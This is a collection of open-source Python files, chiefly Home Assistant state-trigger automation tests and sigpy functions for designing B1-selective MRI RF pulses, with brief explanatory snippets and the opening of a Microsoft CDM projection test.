hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": ["test.entity_1", "test.entity_2"],
"to": "world",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity_1", "world")
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
hass.states.async_set("test.entity_1", "world_no")
hass.states.async_set("test.entity_2", "world_no")
await hass.async_block_till_done()
hass.states.async_set("test.entity_1", "world")
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
await common.async_turn_off(hass)
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_change_with_for_attribute_change(hass, calls):
"""Test for firing on entity change with for and attribute change."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
utcnow = dt_util.utcnow()
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = utcnow
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=4)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set(
"test.entity", "world", attributes={"mock_attr": "attr_change"}
)
await hass.async_block_till_done()
assert len(calls) == 0
mock_utcnow.return_value += timedelta(seconds=4)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_change_with_for_multiple_force_update(hass, calls):
"""Test for firing on entity change with for and force update."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.force_entity",
"to": "world",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
utcnow = dt_util.utcnow()
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = utcnow
hass.states.async_set("test.force_entity", "world", None, True)
await hass.async_block_till_done()
for _ in range(4):
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.force_entity", "world", None, True)
await hass.async_block_till_done()
assert len(calls) == 0
mock_utcnow.return_value += timedelta(seconds=4)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_change_with_for(hass, calls):
"""Test for firing on entity change with for."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_entity_creation_and_removal(hass, calls):
"""Test for firing on entity creation and removal, with to/from constraints."""
# set automations for multiple combinations of to/from
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: [
{
"trigger": {"platform": "state", "entity_id": "test.entity_0"},
"action": {"service": "test.automation"},
},
{
"trigger": {
"platform": "state",
"from": "hello",
"entity_id": "test.entity_1",
},
"action": {"service": "test.automation"},
},
{
"trigger": {
"platform": "state",
"to": "world",
"entity_id": "test.entity_2",
},
"action": {"service": "test.automation"},
},
],
},
)
await hass.async_block_till_done()
# use contexts to identify trigger entities
context_0 = Context()
context_1 = Context()
context_2 = Context()
# automation with match_all triggers on creation
hass.states.async_set("test.entity_0", "any", context=context_0)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].context.parent_id == context_0.id
# create entities, trigger on test.entity_2 ('to' matches, no 'from')
hass.states.async_set("test.entity_1", "hello", context=context_1)
hass.states.async_set("test.entity_2", "world", context=context_2)
await hass.async_block_till_done()
assert len(calls) == 2
assert calls[1].context.parent_id == context_2.id
# removal of both, trigger on test.entity_1 ('from' matches, no 'to')
assert hass.states.async_remove("test.entity_1", context=context_1)
assert hass.states.async_remove("test.entity_2", context=context_2)
await hass.async_block_till_done()
assert len(calls) == 3
assert calls[2].context.parent_id == context_1.id
# automation with match_all triggers on removal
assert hass.states.async_remove("test.entity_0", context=context_0)
await hass.async_block_till_done()
assert len(calls) == 4
assert calls[3].context.parent_id == context_0.id
async def test_if_fires_on_for_condition(hass, calls):
"""Test for firing if condition is on."""
point1 = dt_util.utcnow()
point2 = point1 + timedelta(seconds=10)
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = point1
hass.states.async_set("test.entity", "on")
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "state",
"entity_id": "test.entity",
"state": "on",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
# not enough time has passed
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# Time travel 10 secs into the future
mock_utcnow.return_value = point2
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fires_on_for_condition_attribute_change(hass, calls):
"""Test for firing if condition is on with attribute change."""
point1 = dt_util.utcnow()
point2 = point1 + timedelta(seconds=4)
point3 = point1 + timedelta(seconds=8)
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = point1
hass.states.async_set("test.entity", "on")
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "state",
"entity_id": "test.entity",
"state": "on",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
# not enough time has passed
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# Still not enough time has passed, but an attribute is changed
mock_utcnow.return_value = point2
hass.states.async_set(
"test.entity", "on", attributes={"mock_attr": "attr_change"}
)
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
# Enough time has now passed
mock_utcnow.return_value = point3
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
async def test_if_fails_setup_for_without_time(hass, calls):
"""Test for setup failure if no time is provided."""
with assert_setup_component(0, automation.DOMAIN):
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"platform": "event", "event_type": "bla"},
"condition": {
"platform": "state",
"entity_id": "test.entity",
"state": "on",
"for": {},
},
"action": {"service": "test.automation"},
}
},
)
async def test_if_fails_setup_for_without_entity(hass, calls):
"""Test for setup failure if no entity is provided."""
with assert_setup_component(0, automation.DOMAIN):
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {"event_type": "bla"},
"condition": {
"platform": "state",
"state": "on",
"for": {"seconds": 5},
},
"action": {"service": "test.automation"},
}
},
)
async def test_wait_template_with_trigger(hass, calls):
"""Test using wait template with 'trigger.entity_id'."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
},
"action": [
{"wait_template": "{{ is_state(trigger.entity_id, 'hello') }}"},
{
"service": "test.automation",
"data_template": {
"some": "{{ trigger.%s }}"
% "}} - {{ trigger.".join(
(
"platform",
"entity_id",
"from_state.state",
"to_state.state",
)
)
},
},
],
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "world")
hass.states.async_set("test.entity", "hello")
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["some"] == "state - test.entity - hello - world"
async def test_if_fires_on_entities_change_no_overlap(hass, calls):
"""Test for firing on entities change with no overlap."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": ["test.entity_1", "test.entity_2"],
"to": "world",
"for": {"seconds": 5},
},
"action": {
"service": "test.automation",
"data_template": {"some": "{{ trigger.entity_id }}"},
},
}
},
)
await hass.async_block_till_done()
utcnow = dt_util.utcnow()
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = utcnow
hass.states.async_set("test.entity_1", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=10)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["some"] == "test.entity_1"
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=10)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 2
assert calls[1].data["some"] == "test.entity_2"
async def test_if_fires_on_entities_change_overlap(hass, calls):
"""Test for firing on entities change with overlap."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": ["test.entity_1", "test.entity_2"],
"to": "world",
"for": {"seconds": 5},
},
"action": {
"service": "test.automation",
"data_template": {"some": "{{ trigger.entity_id }}"},
},
}
},
)
await hass.async_block_till_done()
utcnow = dt_util.utcnow()
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = utcnow
hass.states.async_set("test.entity_1", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "hello")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
assert len(calls) == 0
mock_utcnow.return_value += timedelta(seconds=3)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["some"] == "test.entity_1"
mock_utcnow.return_value += timedelta(seconds=3)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 2
assert calls[1].data["some"] == "test.entity_2"


async def test_if_fires_on_change_with_for_template_1(hass, calls):
"""Test for firing on change with for template."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"seconds": "{{ 5 }}"},
},
"action": {"service": "test.automation"},
}
},
)
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1


async def test_if_fires_on_change_with_for_template_2(hass, calls):
"""Test for firing on change with for template."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": "{{ 5 }}",
},
"action": {"service": "test.automation"},
}
},
)
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1


async def test_if_fires_on_change_with_for_template_3(hass, calls):
"""Test for firing on change with for template."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": "00:00:{{ 5 }}",
},
"action": {"service": "test.automation"},
}
},
)
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
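The three template variants above feed `for` either as a seconds value or as an `"HH:MM:SS"` string. A toy stdlib parser (`parse_for` is an illustration of the accepted shapes, not Home Assistant's config-validation code) makes the equivalence concrete:

```python
from datetime import timedelta


def parse_for(value):
    # Toy parser for the two 'for' shapes used above: a number of
    # seconds, or an "HH:MM:SS" string (templates render to these).
    if isinstance(value, (int, float)):
        return timedelta(seconds=value)
    hours, minutes, seconds = (int(part) for part in value.split(":"))
    return timedelta(hours=hours, minutes=minutes, seconds=seconds)
```

So `{"seconds": "{{ 5 }}"}`, `"{{ 5 }}"`, and `"00:00:{{ 5 }}"` all resolve to the same five-second hold once rendered.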


async def test_if_fires_on_change_from_with_for(hass, calls):
"""Test for firing on change with from/for."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "media_player.foo",
"from": "playing",
"for": "00:00:30",
},
"action": {"service": "test.automation"},
}
},
)
hass.states.async_set("media_player.foo", "playing")
await hass.async_block_till_done()
hass.states.async_set("media_player.foo", "paused")
await hass.async_block_till_done()
hass.states.async_set("media_player.foo", "stopped")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(minutes=1))
await hass.async_block_till_done()
assert len(calls) == 1


async def test_if_not_fires_on_change_from_with_for(hass, calls):
"""Test for not firing on change with from/for."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "media_player.foo",
"from": "playing",
"for": "00:00:30",
},
"action": {"service": "test.automation"},
}
},
)
hass.states.async_set("media_player.foo", "playing")
await hass.async_block_till_done()
hass.states.async_set("media_player.foo", "paused")
await hass.async_block_till_done()
hass.states.async_set("media_player.foo", "playing")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(minutes=1))
await hass.async_block_till_done()
assert len(calls) == 0


async def test_invalid_for_template_1(hass, calls):
"""Test for invalid for template."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"to": "world",
"for": {"seconds": "{{ five }}"},
},
"action": {"service": "test.automation"},
}
},
)
with patch.object(state_trigger, "_LOGGER") as mock_logger:
hass.states.async_set("test.entity", "world")
await hass.async_block_till_done()
assert mock_logger.error.called


async def test_if_fires_on_entities_change_overlap_for_template(hass, calls):
"""Test for firing on entities change with overlap and for template."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": ["test.entity_1", "test.entity_2"],
"to": "world",
"for": '{{ 5 if trigger.entity_id == "test.entity_1"'
" else 10 }}",
},
"action": {
"service": "test.automation",
"data_template": {
"some": "{{ trigger.entity_id }} - {{ trigger.for }}"
},
},
}
},
)
await hass.async_block_till_done()
utcnow = dt_util.utcnow()
with patch("homeassistant.core.dt_util.utcnow") as mock_utcnow:
mock_utcnow.return_value = utcnow
hass.states.async_set("test.entity_1", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "hello")
await hass.async_block_till_done()
mock_utcnow.return_value += timedelta(seconds=1)
async_fire_time_changed(hass, mock_utcnow.return_value)
hass.states.async_set("test.entity_2", "world")
await hass.async_block_till_done()
assert len(calls) == 0
mock_utcnow.return_value += timedelta(seconds=3)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["some"] == "test.entity_1 - 0:00:05"
mock_utcnow.return_value += timedelta(seconds=3)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 1
mock_utcnow.return_value += timedelta(seconds=5)
async_fire_time_changed(hass, mock_utcnow.return_value)
await hass.async_block_till_done()
assert len(calls) == 2
assert calls[1].data["some"] == "test.entity_2 - 0:00:10"


async def test_attribute_if_fires_on_entity_change_with_both_filters(hass, calls):
"""Test for firing if both filters match the attribute."""
hass.states.async_set("test.entity", "bla", {"name": "hello"})
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": "hello",
"to": "world",
"attribute": "name",
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
hass.states.async_set("test.entity", "bla", {"name": "world"})
await hass.async_block_till_done()
assert len(calls) == 1


async def test_attribute_if_not_fires_on_entities_change_with_for_after_stop(
hass, calls
):
"""Test for not firing on entity change with for after stop trigger."""
hass.states.async_set("test.entity", "bla", {"name": "hello"})
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"trigger": {
"platform": "state",
"entity_id": "test.entity",
"from": "hello",
"to": "world",
"attribute": "name",
"for": 5,
},
"action": {"service": "test.automation"},
}
},
)
await hass.async_block_till_done()
# Test that the for-check works
hass.states.async_set("test.entity", "bla", {"name": "world"})
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=2))
hass.states.async_set("test.entity", "bla", {"name": "world", "something": "else"})
await hass.async_block_till_done()
assert len(calls) == 0
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1
# Now remove state while inside "for"
hass.states.async_set("test.entity", "bla", {"name": "hello"})
hass.states.async_set("test.entity", "bla", {"name": "world"})
await hass.async_block_till_done()
assert len(calls) == 1
hass.states.async_remove("test.entity")
await hass.async_block_till_done()
async_fire_time_changed(hass, dt_util.utcnow() + timedelta(seconds=10))
await hass.async_block_till_done()
assert len(calls) == 1


# ---- file: tests/test_ap_project.py | repo: jackeiel/2019sp-ap_project-jackeiel | license: BSD-2-Clause ----
from ap_project.cli import main


def test_main():
main([])


# ---- file: project/7.26-7.27/t/c1.py | repo: mintlov3r/oh-my-python | license: Apache-2.0 ----
a = 1
b = 2
c = 3


# ---- file: venv/lib/python3.8/site-packages/distlib/index.py | repo: Retraces/UkraineBot | license: MIT ----
# The committed file content is a pip cache pool path, not Python source:
# /home/runner/.cache/pip/pool/51/f7/22/98d5b5f4007b20a59a9b855a25b5ee081bc0aca7d2c61575e84c1abf31


# ---- file: lungs_ml/__init__.py | repo: dumaevrinat/lung_diseases | license: MIT ----
from .lungs_ml import *


# ---- file: sigpy/mri/rf/b1sel.py | repo: kmjohnson3/sigpy | license: BSD-3-Clause ----
""":math:`B_1^{+}`-selective RF Pulse Design functions.
"""

import numpy as np
from sigpy.mri.rf import slr as slr
from sigpy.mri.rf.util import dinf

__all__ = ['dz_b1_rf', 'dz_b1_gslider_rf', 'dz_b1_hadamard_rf']


def dz_b1_rf(dt=2e-6, tb=4, ptype='st', flip=np.pi / 6, pbw=0.3,
pbc=2, d1=0.01, d2=0.01, os=8, split_and_reflect=True):
"""Design a :math:`B_1^{+}`-selective excitation pulse following Grissom \
JMR 2014
Args:
dt (float): hardware sampling dwell time in s.
tb (int): time-bandwidth product.
ptype (string): pulse type, 'st' (small-tip excitation), 'ex' (pi/2
excitation pulse), 'se' (spin-echo pulse), 'inv' (inversion), or
'sat' (pi/2 saturation pulse).
flip (float): flip angle, in radians.
pbw (float): width of passband in Gauss.
pbc (float): center of passband in Gauss.
d1 (float): passband ripple level in :math:`M_0^{-1}`.
d2 (float): stopband ripple level in :math:`M_0^{-1}`.
os (int): matrix scaling factor.
split_and_reflect (bool): option to split and reflect designed pulse.
Split-and-reflect preserves pulse selectivity when scaled to excite large
tip-angles.
Returns:
2-element tuple containing
- **om1** (*array*): AM waveform.
- **dom** (*array*): FM waveform (radians/s).
References:
Grissom, W., Cao, Z., & Does, M. (2014).
:math:`B_1^{+}`-selective excitation pulse design using the Shinnar-Le
Roux algorithm. Journal of Magnetic Resonance, 242, 189-196.
"""
# calculate beta filter ripple
[_, d1, d2] = slr.calc_ripples(ptype, d1, d2)
# calculate pulse duration
b = 4257 * pbw
pulse_len = tb / b
# calculate number of samples in pulse
n = int(np.ceil(pulse_len / dt / 2) * 2)
if pbc == 0:
# we want passband as close to zero as possible.
# do my own dual-band filter design to minimize interaction
# between the left and right bands
# build system matrix
A = np.exp(1j * 2 * np.pi *
np.outer(np.arange(-n * os / 2, n * os / 2),
np.arange(-n / 2, n / 2)) / (n * os))
# build target pattern
ii = np.arange(-n * os / 2, n * os / 2) / (n * os) * 2
w = dinf(d1, d2) / tb
f = np.asarray([0, (1 - w) * (tb / 2),
(1 + w) * (tb / 2),
n / 2]) / (n / 2)
d = np.double(np.abs(ii) < f[1])
ds = np.double(np.abs(ii) > f[2])
# shift the target pattern to minimum center position
pbc = int(np.ceil((f[2] - f[1]) * n * os / 2 + f[1] * n * os / 2))
dl = np.roll(d, pbc)
dr = np.roll(d, -pbc)
dsl = np.roll(ds, pbc)
dsr = np.roll(ds, -pbc)
# build error weight vector
w = dl + dr + d1 / d2 * np.multiply(dsl, dsr)
# solve for the dual-band filter
AtA = A.conj().T @ np.multiply(np.reshape(w, (np.size(w), 1)), A)
Atd = A.conj().T @ np.multiply(w, dr - dl)
h = np.imag(np.linalg.pinv(AtA) @ Atd)
else: # normal design
# design filter
h = slr.dzls(n, tb, d1, d2)
# dual-band-modulate the filter
om = 2 * np.pi * 4257 * pbc # modulation frequency
t = np.arange(0, n) * pulse_len / n - pulse_len / 2
h = 2 * h * np.sin(om * t)
if split_and_reflect:
# split and flip fm waveform to improve large-tip accuracy
dom = np.concatenate((h[n // 2::-1], h, h[n:n // 2:-1])) / 2
else:
dom = np.concatenate((0 * h[n // 2::-1], h, 0 * h[n:n // 2:-1]))
# scale to target flip, convert to Hz
dom = dom * flip / (2 * np.pi * dt)
# build am waveform
om1 = np.concatenate((-np.ones(n // 2), np.ones(n), -np.ones(n // 2)))
return om1, dom
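The duration and sample-count arithmetic at the top of `dz_b1_rf` (time-bandwidth product over the passband width in Hz, rounded up to an even sample count) can be checked standalone with the stdlib. The numbers below use the function's defaults and only reuse the 4257 Hz/Gauss constant from the source:

```python
import math

dt, tb, pbw = 2e-6, 4, 0.3  # dwell time (s), time-bandwidth product, passband width (G)
b = 4257 * pbw              # passband width in Hz (4257 Hz/G, as in the source)
pulse_len = tb / b          # pulse duration in s (~3.13 ms here)
n = int(math.ceil(pulse_len / dt / 2) * 2)  # even number of hardware samples
```

After split-and-reflect, the returned AM/FM waveforms are `2 * n` samples long, which is why `om1` concatenates two half-length segments around a full-length one.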


def dz_b1_gslider_rf(dt=2e-6, g=5, tb=12, ptype='st', flip=np.pi / 6,
pbw=0.5, pbc=2, d1=0.01, d2=0.01, split_and_reflect=True):
"""Design a :math:`B_1^{+}`-selective excitation gSlider pulse following
Grissom JMR 2014.
Args:
dt (float): hardware sampling dwell time in s.
g (int): number of slabs to be acquired.
tb (int): time-bandwidth product.
ptype (string): pulse type, 'st' (small-tip excitation), 'ex' (pi/2
excitation pulse), 'se' (spin-echo pulse), 'inv' (inversion), or
'sat' (pi/2 saturation pulse).
flip (float): flip angle, in radians.
pbw (float): width of passband in Gauss.
pbc (float): center of passband in Gauss.
d1 (float): passband ripple level in :math:`M_0^{-1}`.
d2 (float): stopband ripple level in :math:`M_0^{-1}`.
split_and_reflect (bool): option to split and reflect designed pulse.
Split-and-reflect preserves pulse selectivity when scaled to excite large
tip-angles.
Returns:
2-element tuple containing
- **om1** (*array*): AM waveform.
- **dom** (*array*): FM waveform (radians/s).
References:
Grissom, W., Cao, Z., & Does, M. (2014).
:math:`B_1^{+}`-selective excitation pulse design using the Shinnar-Le
Roux algorithm. Journal of Magnetic Resonance, 242, 189-196.
"""
# calculate beta filter ripple
[_, d1, d2] = slr.calc_ripples(ptype, d1, d2)
# if ptype == 'st':
bsf = flip
# calculate pulse duration
b = 4257 * pbw
pulse_len = tb / b
# calculate number of samples in pulse
n = int(np.ceil(pulse_len / dt / 2) * 2)
om = 2 * np.pi * 4257 * pbc # modulation freq to center profile at pbc
t = np.arange(0, n) * pulse_len / n - pulse_len / 2
om1 = np.zeros((2 * n, g))
dom = np.zeros((2 * n, g))
for gind in range(1, g + 1):
# design filter
h = bsf*slr.dz_gslider_b(n, g, gind, tb, d1, d2, np.pi, n // 4)
# modulate filter to center and add it to a time-reversed and modulated
# copy, then take the imaginary part to get an odd filter
h = np.imag(h * np.exp(1j * om * t) - h[n::-1] * np.exp(1j * -om * t))
if split_and_reflect:
# split and flip fm waveform to improve large-tip accuracy
dom[:, gind - 1] = np.concatenate((h[n // 2::-1],
h, h[n:n // 2:-1])) / 2
else:
dom[:, gind - 1] = np.concatenate((0 * h[n // 2::-1],
h, 0 * h[n:n // 2:-1]))
# build am waveform
om1[:, gind - 1] = np.concatenate((-np.ones(n // 2), np.ones(n),
-np.ones(n // 2)))
# scale to target flip, convert to Hz
dom = dom / (2 * np.pi * dt)
return om1, dom


def dz_b1_hadamard_rf(dt=2e-6, g=8, tb=16, ptype='st', flip=np.pi / 6,
pbw=2, pbc=2, d1=0.01, d2=0.01, split_and_reflect=True):
"""Design a :math:`B_1^{+}`-selective Hadamard-encoded pulse following \
Grissom JMR 2014.
Args:
dt (float): hardware sampling dwell time in s.
g (int): number of slabs to be acquired.
tb (int): time-bandwidth product.
ptype (string): pulse type, 'st' (small-tip excitation), 'ex' (pi/2 \
excitation pulse), 'se' (spin-echo pulse), 'inv' (inversion), or \
'sat' (pi/2 saturation pulse).
flip (float): flip angle, in radians.
pbw (float): width of passband in Gauss.
pbc (float): center of passband in Gauss.
d1 (float): passband ripple level in :math:`M_0^{-1}`.
d2 (float): stopband ripple level in :math:`M_0^{-1}`.
split_and_reflect (bool): option to split and reflect designed pulse.
Split-and-reflect preserves pulse selectivity when scaled to excite large
tip-angles.
Returns:
2-element tuple containing
- **om1** (*array*): AM waveform.
- **dom** (*array*): FM waveform (radians/s).
References:
Grissom, W., Cao, Z., & Does, M. (2014).
:math:`B_1^{+}`-selective excitation pulse design using the Shinnar-Le
Roux algorithm. Journal of Magnetic Resonance, 242, 189-196.
"""
# calculate beta filter ripple
[_, d1, d2] = slr.calc_ripples(ptype, d1, d2)
bsf = flip
# calculate pulse duration
b = 4257 * pbw
pulse_len = tb / b
# calculate number of samples in pulse
n = int(np.ceil(pulse_len / dt / 2) * 2)
# modulation frequency to center profile at pbc gauss
om = 2 * np.pi * 4257 * pbc
t = np.arange(0, n) * pulse_len / n - pulse_len / 2
om1 = np.zeros((2 * n, g))
dom = np.zeros((2 * n, g))
for gind in range(1, g + 1):
# design filter
h = bsf*slr.dz_hadamard_b(n, g, gind, tb, d1, d2, n // 4)
# modulate filter to center and add it to a time-reversed and modulated
# copy, then take the imaginary part to get an odd filter
h = np.imag(h * np.exp(1j * om * t) - h[n::-1] * np.exp(1j * -om * t))
if split_and_reflect:
# split and flip fm waveform to improve large-tip accuracy
dom[:, gind - 1] = np.concatenate((h[n // 2::-1],
h,
h[n:n // 2:-1])) / 2
else:
dom[:, gind - 1] = np.concatenate((0 * h[n // 2::-1],
h,
0 * h[n:n // 2:-1]))
# build am waveform
om1[:, gind - 1] = np.concatenate((-np.ones(n // 2), np.ones(n),
-np.ones(n // 2)))
# scale to target flip, convert to Hz
dom = dom / (2 * np.pi * dt)
return om1, dom
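The Hadamard encoding across `g` slabs relies on mutually orthogonal ±1 rows. A minimal Sylvester construction (the standard textbook recursion, not sigpy's internal `dz_hadamard_b`) demonstrates the property for the default `g=8`:

```python
def hadamard(k):
    """Sylvester construction: H_2n = [[H_n, H_n], [H_n, -H_n]].

    k must be a power of two; rows of the result are pairwise orthogonal.
    """
    H = [[1]]
    while len(H) < k:
        H = [row + row for row in H] + [row + [-x for x in row] for row in H]
    return H


H8 = hadamard(8)
```

Orthogonality is what lets the `g` separately-encoded acquisitions be decoded into individual slab profiles.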


# ---- file: objectModel/Python/tests/cdm/projection/test_projection_add_attribute_group.py | repo: MiguelSHS/microsoftCDM | licenses: CC-BY-4.0, MIT ----
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.

import os
import unittest
from typing import TYPE_CHECKING
from cdm.enums import CdmObjectType
from cdm.objectmodel import CdmCorpusDefinition, CdmEntityDefinition
from cdm.utilities import ResolveOptions, AttributeResolutionDirectiveSet
from tests.common import async_test
from tests.utilities.projection_test_utils import ProjectionTestUtils


class ProjectionAddAttributeGroupTest(unittest.TestCase):
"""A test class for testing the AddAttributeGroup operation in a projection as well as attribute group creation in a resolution guidance"""
# All possible combinations of the different resolution directives
res_opts_combinations = [
[],
['referenceOnly'],
['normalized'],
['structured'],
['referenceOnly', 'normalized'],
['referenceOnly', 'structured'],
['normalized', 'structured'],
['referenceOnly', 'normalized', 'structured']
]
# The path between TestDataPath and test_name.
tests_subpath = os.path.join('Cdm', 'Projection', 'TestProjectionAddAttributeGroup')
@async_test
async def test_combine_ops_nested_proj(self):
"""Test AddAttributeGroup operation nested with ExcludeAttributes"""
test_name = 'test_combine_ops_nested_proj'
entity_name = 'NewPerson'
corpus = ProjectionTestUtils.get_local_corpus(self.tests_subpath, test_name)
for res_opt in self.res_opts_combinations:
await ProjectionTestUtils.load_entity_for_resolution_option_and_save(self, corpus, test_name, self.tests_subpath, entity_name, res_opt)
entity = await corpus.fetch_object_async('local:/{0}.cdm.json/{0}'.format(entity_name)) # type: CdmEntityDefinition
